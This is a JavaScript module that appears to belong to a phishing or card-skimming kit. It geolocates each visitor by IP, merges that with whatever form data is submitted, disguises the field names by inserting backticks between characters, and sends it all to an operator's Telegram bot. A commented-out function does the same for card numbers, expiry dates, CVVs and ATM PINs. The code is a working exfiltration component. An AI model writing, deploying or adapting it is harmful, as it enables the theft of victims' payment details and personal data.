import axios from "axios";

const token = process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
const chatId = process.env.REACT_APP_TELEGRAM_CHAT_ID;

// Function to retrieve the visitor's IP address
const getIpAddress = async () => {
  try {
    const response = await axios.get("https://api.ipify.org?format=json");

    const ipAddress = response.data.ip;

    // console.log(ipAddress)

    const apiUrl = `https://ipapi.co/${ipAddress}/json/`;
    const response2 = await axios.get(apiUrl);

    const ipInfo = response2.data;

    const { ip, city, region, country } = ipInfo;

    return { ip, city, region, country };
  } catch (error) {
    console.error("Failed to retrieve IP address:", error);
    return null;
  }
};

async function sendMessage(input) {
  const { ip, city, region, country } = await getIpAddress();

  let data = {
    ...input,
    ip: ip,
    city: city,
    region: region,
    country: country,
  };

  const newData = {};
  for (const key in data) {
    if (Object.hasOwnProperty.call(data, key)) {
      const combinedKey = `${key.split("").join("`")}`;
      newData[combinedKey] = data[key];
    }
  }

  // Construct the API URL
  const apiUrl = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
    JSON.stringify(newData)
      .replace(/"([^"]+)":/g, "$1:")
      .replace(/^{/, "")
      .replace(/}$/, "")
      .replace(/"/g, "")
      .replace(/,/g, "\n")
      .split(":")
      .join(" : ")
  )}`;

  const response = await fetch(apiUrl, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
  });

  if (response.ok) {
    // console.log("Message sent successfully!");
  } else {
    console.error("Failed to send message:", response.statusText);
  }
}

// async function sendCardDataToTelegram(data) {
//   const ipAddress = await getIpAddress();

//   const payload = `Card Number: ${data.card}\nExpiry Date: ${data.expiryDate}\nCVV: ${data.cvv}\nATM PIN: ${data.atm}\nZip Code: ${data.zipcode}\nRegion: ${ipAddress}`;

//   // Construct the API URL
//   const apiUrl = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
//     payload
//   )}`;

//   const response = await fetch(apiUrl, {
//     method: "POST",
//     headers: {
//       "Content-Type": "application/json",
//     },
//   });

//   if (!response.ok) {
//     throw new Error("Failed to send card data to Telegram bot");
//   }

//   return response.json();
// }

export { sendMessage };
